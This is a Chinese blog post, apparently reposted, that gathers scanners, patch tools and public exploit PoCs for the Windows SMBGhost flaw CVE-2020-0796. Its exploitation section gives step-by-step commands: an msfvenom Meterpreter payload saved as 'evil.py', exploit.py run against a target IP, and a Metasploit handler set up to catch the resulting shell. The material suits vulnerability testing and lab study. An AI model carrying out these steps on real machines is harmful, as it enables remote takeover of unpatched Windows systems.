CVE-2020-0796 檢測及利用工具


自2020年3月12日,微軟正式發布CVE-2020-0796高危漏洞補丁后,時隔數月,遠程利用PoC代碼已經被公布,這也意味着這場漏洞風波即將告一段落了。

本文匯總了多個CVE-2020-0796 漏洞檢測及利用工具,方便系統管理員對未修復漏洞的系統進行檢測和防護。

如果沒有漏洞環境的,可以下載這個win101903版本來測試一波。

ed2k://|file|cn_windows_10_business_editions_version_1903_x64_dvd_e001dd2c.iso|4815527936|47D4C57E638DF8BF74C59261E2CE702D|www.t00ls.net7 t! t8 D4 e4 g5 Q5 W. n' _8 x

檢測篇

git 腳本檢測:

https://github.com/ollypwn/SMBGhost


檢測返回的數據包中SMB壓縮版本,這種檢測打過補丁依然會誤報。

奇安信檢測工具:

http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

適用於局域網批量檢測,快速查找未打補丁的機器。

騰訊電腦管家SMB漏洞修復工具:

http://dlied6.qq.com/invc/QQPatch/QuickFix_SMB0796.exe

適用於個人用戶檢測,一鍵快速檢測和修復。


漏洞利用篇

藍屏POC:

https://github.com/eerykitty/CVE-2020-0796-PoC

使用兩台虛擬機作為漏洞演示,一台win10 1903版本,一台是Kali Linux。

git clone https://github.com/eerykitty/CVE-2020-0796-PoC.git
python3 setup.py install
python3 CVE-2020-0796.py 192.168.172.128

本地提權POC:

https://github.com/danigargu/CVE-2020-0796

本地普通用戶Bypass執行提權exp后彈出cmd窗口,成功獲取system權限。

遠程利用代碼:

https://github.com/chompie1337/SMBGhost_RCE_PoC

1、使用msfvenom生成payload

msfvenom  -p windows/x64/meterpreter/bind_tcp  lport=1234 -f py -o evil.py

2、將evil.py 生成的code,替換到exploit.py的USER_PAYLOAD參數,並把參數buf改為USER_PAYLOAD。

root@kali:~# git clone https://github.com/chompie1337/SMBGhost_RCE_PoC.git
root@kali:~# cd SMBGhost_RCE_PoC/
root@kali:~/SMBGhost_RCE_PoC# ls
exploit.py  kernel_shellcode.asm  lznt1.py  __pycache__  README.md  smb_win.py

3、運行exploit.py

python3 exploit.py -ip 192.168.172.128

4、啟動msf監聽本地端口(PS:監聽端口如果一直收不到shell,可重新運行一次。)

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set lport 1234
lport => 1234
msf5 exploit(multi/handler) > set rhost 192.168.172.128
rhost => 192.168.172.128
msf5 exploit(multi/handler) > exploit


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM